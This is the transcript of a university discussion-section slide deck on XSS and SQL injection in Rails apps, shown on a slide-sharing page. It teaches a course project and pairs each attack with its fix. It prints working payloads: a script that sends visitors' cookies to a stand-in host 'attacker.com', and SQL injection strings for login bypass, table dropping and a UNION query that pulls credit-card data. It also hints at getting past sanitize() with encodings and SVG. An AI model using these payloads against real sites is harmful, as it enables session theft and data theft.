Presentation is loading. Please wait.

Presentation is loading. Please wait.

Project 7 Discussion Section XSS and SQL Injection in Rails.

Published by Modified over 9 years ago

Similar presentations

Presentation on theme: "Project 7 Discussion Section XSS and SQL Injection in Rails."— Presentation transcript:

1 Project 7 Discussion Section XSS and SQL Injection in Rails

2 Agenda XSS coverage  XSS #1: Project 7 Part 1  XSS #2: Project 5 Part 3  Rails’ sanitize(): Project 7 Part 2 SQL Injection (Project 7 Part 3)  SQL Injection #1  SQL Injection #2 Project 7 Specifics: encodings, SVG

3 XSS and SQL Injection Code injection vulnerabilities.  Rough generalization: Data input unexpectedly becomes code. In XSS, the code is JavaScript in HTML document. In SQL Injection, the code is SQL to the database.

4 XSS Background Same-origin policy prevents JavaScript from a.com to manipulate DOM from b.com. This does not work from evil.com. frames[0].forms[0].onsubmit = function() { // send me your login and password... } So attacker needs to inject JavaScript code into some page on domain.

5 XSS #1

6 In controller: def search @query = params[:query] end In view Search result for Input through GET method

7 XSS #1: Normal Search Input: flower URL: www.vulnerable.com/?query=flowerwww.vulnerable.com/?query=flower Resulting page Search result for flower

8 XSS #1: Abnormal Search Input: alert(document.cookie) URL-encoded input: %3Cscript%3Ealert%28document.cookie% 29%3C/script%3E%0A URL: www.vulnerable.com/?query= %3Cscript%3Ealert%28document.cookie% 29%3C/script%3E%0A

9 XSS #1 Result page Search result for alert(document.cookie) URL-encoding has been decoded automatically.

10 XSS #1: Attacker Search Q: What does this do? (new Image()).src=“http://attacker.com/email.php?content=” + document.cookie A: Send visitor’s cookie to attacker! URL-encoded URL: www.vulnerable.com/?query= %3Cscript%3E%28new%20Image%28%29%29.src%3D%u201Chtt p%3A//attacker.com/email.php%3Fcontent%3D%u201D%20%20%2 0document.cookie%u201D%3B%3C/script%3E Make intended victim visit the above URL

11 XSS #1 Resulting page Search result for (new Image()).src=“http://attacker.c om/email.php?content=” + document.cookie

12 XSS #1 Fix: Escape “ ”  “<“ → “<”  “>” → “>” h function does this In view Search result for

13 XSS #1 Resulting page on attempted attack Search result for <script>(new Image()).src=“http://attacker.c om/email.php?content=” + document.cookie</script>

14 XSS #1 Questions?

15 XSS #2 Project 5 Part 3 File upload allows any file upload, including HTML File is opened on same domain No sanitization of the HTML file at all against JavaScript. Possible solution: document.alert(cookie)

16 XSS #2 Possible Fix: Delete JavaScript  Try viewing an HTML file with JavaScript in Gmail  Result of uploading last file: [blank] Eventual Fix: Make server tell browser to treat the file as attachment  Now file opened on local hard drive  Same-origin policy prevents XSS

17 XSS #2 Questions?

18 Rails’ sanitize() How if you want to allow HTML tags? Solution: sanitize function

19 Rails’ sanitize() Rails 2.0 uses new blacklist / whitelist filter Whitelist prevents unexpected protocols  You might blacklist javascript: as a protocol  However, there are livescript: and mocha: in Netscape 4 and vbscript: in IE 6. Default generally works well. src, href with “javascript:” deleted deleted

20 Rails’ sanitize() Put customizations in config/environment.rb Restart after you change anything under config Lesson from project 7: Careful what additional tags, protocols you allow!

21 Rails’ sanitize() Questions?

22 SQL Injection In SQL Injection, SQL is injected into vulnerable SQL execution statement. Result: Unexpected SQL execution

23 SQL Injection #1: Login Form

24 SQL Injection #1 Vulnerable Code User.find(:all, :conditions => “username = #{params[:username]} AND password = #{params[:password]}”) This translates into  SELECT * FROM users WHERE (username = ‘...’ AND password =‘...’)  Attacker decides what … will be.

25 SQL Injection #1 Normal input  username = tom  password = passw0rd Resulting Query SELECT* FROM users WHERE (username = ‘tom’ AND password = ‘passw0rd’)

26 SQL Injection #1 Attacker Input  username: tom’) --  password: whatever Resulting Query  SELECT * FROM users WHERE (username = ‘tom’) -- ’ AND password = ‘whatever’)  Logs in as tom regardless of password.

27 SQL Injection #1 Abnormal Input  username: ‘); DROP TABLE users --  password: whatever Resulting Query:  SELECT * FROM users WHERE (username = ‘’; DROP TABLE users -- ’ AND password = ‘whatever’) Q: Would this work? A: No. Semicolon not allowed, so no way to inject new statement.

28 SQL Injection #1: Fix Fix the vulnerable statement  Vulnerable Statement User.find(:all, :conditions => “username = #{params[:username]} AND password = #{params[:password]}”)  Fixed Statement User.find(:all, :conditions => {:username => params[:username], :password => params[:password]}) In second form, Rails knows each argument is supposed to be for one parameter and sanitize for you. Questions?

29 SQL Injection #2 Pizza example, rehashed

30 SQL Injection #2 In controller @pizza_orders = PizzaOrder.find(:all, :conditions => “month = #{params[:month]}”)

31 SQL Injection #2 In view

32 SQL Injection #2 Resulting Query SELECT * FROM pizza_orders where (month = ‘...’) Normal input  month = 10 Resulting Query SELECT * FROM pizza_orders WHERE (month = ‘10’)

33 SQL Injection #2

34 Attacker Input  month = 13’) UNION ALL SELECT name, CC_num, exp_mon, exp_year FROM creditcards -- Resulting Query SELECT * FROM pizza_orders WHERE (month = 13’) UNION ALL SELECT name, CC_num, exp_mon, exp_year FROM creditcards -- ’)

35 SQL Injection #2

36 SQL Injection #2: Fix @pizza_orders = PizzaOrder.find(:all, :conditions => “month = #{params[:month]}”) Fixed Statement @pizza_orders = PizzaOrder.find(:all, :conditions => {:month => params[:month])

37 SQL Injection #2 Questions?

38 Project 7 Specifics: URL-Encoding Firefox allows URL w/o URL encoding Put in %20 at the end, or Firefox trims spaces in the back Once you figure out exact URL, use any URL encoder online

39 Project 7 Specifics: Encoding javascript:, stripped by sanitize How do we get around? See protocol allowed in config/environment.rb and consider different encodings For encoding, feel free to use any encoder online

40 Project 7 Specifics: SVG Use SVG document for Part 2. SVG document  Use data protocol to encode SVG document You can include tag in SVG document. See http://www.w3schools.com/svg/svg_examples.as p http://www.w3schools.com/svg/svg_examples.as p

41 Project 7 Specifics: Email Script Email script link in Simple Blog I monitor email script usage

42 Project 7 Specifics Questions? Comments?

Download ppt "Project 7 Discussion Section XSS and SQL Injection in Rails."

Similar presentations

Nick Feamster CS 6262 Spring 2009

Nick Feamster CS 6262 Spring 2009
Cross Site Scripting (XSS)

Cross Site Scripting (XSS)
What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.

What is code injection? Code injection is the exploitation of a computer bug that is caused by processing invalid data. Code injection can be used by.
Nick Tsamis University of Tulsa CS 7493 April 2013.

Nick Tsamis University of Tulsa CS 7493 April 2013.
Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.

Creating Stronger, Safer, Web Facing Code JPL IT Security Mary Rivera June 17, 2011.
©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane

©2009 Justin C. Klein Keane PHP Code Auditing Session 5 XSS & XSRF Justin C. Klein Keane
Cross Site Scripting & SQL injection

Cross Site Scripting & SQL injection
Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University

Attacking Authentication and Authorization CSE 591 – Security and Vulnerability Analysis Spring 2015 Adam Doupé Arizona State University
WebGoat & WebScarab “What is computer security for $1000 Alex?”

WebGoat & WebScarab “What is computer security for $1000 Alex?”
EECS 354 Network Security Cross Site Scripting (XSS)

EECS 354 Network Security Cross Site Scripting (XSS)
COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.

COMP 321 Week 12. Overview Web Application Security  Authentication  Authorization  Confidentiality Cross-Site Scripting Lab 12-1 Introduction.
Introduction The concept of “SQL Injection”

Introduction The concept of “SQL Injection”
By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.

By Brian Vees.  SQL Injection  Username Enumeration  Cross Site Scripting (XSS)  Remote Code Execution  String Formatting Vulnerabilities.
It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.

It’s always better live. MSDN Events Securing Web Applications Part 1 of 2 Understanding Threats and Attacks.
Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.

Introduction to the OWASP Top 10. Cross Site Scripting (XSS)  Comes in several flavors:  Stored  Reflective  DOM-Based.
1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.

1 SQL injection: attacks and defenses Dan Boneh CS 142 Winter 2009.
Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.

Lab 3 Cookie Stealing using XSS Kara James, Chelsea Collins, Trevor Norwood, David Johnson.
Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software

Handling Security Threats in Kentico CMS Karol Jarkovsky Sr. Solution Architect Kentico Software
WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.

WEB SECURITY WORKSHOP TEXSAW 2013 Presented by Joshua Hammond Prepared by Scott Hand.
1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

1 IS 2150 / TEL 2810 Introduction to Security James Joshi Associate Professor, SIS Lecture 12.1 Nov 20, 2012 SQL Injection Cross-Site Scripting.

Similar presentations

Ads by Google